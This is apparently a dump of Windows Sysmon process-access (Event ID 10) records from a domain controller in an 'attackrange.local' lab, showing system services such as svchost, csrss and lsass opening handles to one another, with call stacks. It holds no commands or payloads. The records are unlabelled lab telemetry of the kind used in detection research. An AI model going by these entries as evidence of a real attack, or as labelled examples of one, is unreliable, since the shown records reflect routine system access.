13:36:17.336{59A5CD1D-8E46-6005-1600-00000000A301}15443060C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.320{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.304{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.304{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.289{59A5CD1D-8E44-6005-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.007{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:17.007{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED0-6005-9400-00000000A301}4344C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.805{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.789{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.789{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:18.789{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8ED1-6005-9500-00000000A301}3048C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8ED6-6005-9600-00000000A301}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:22.806{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 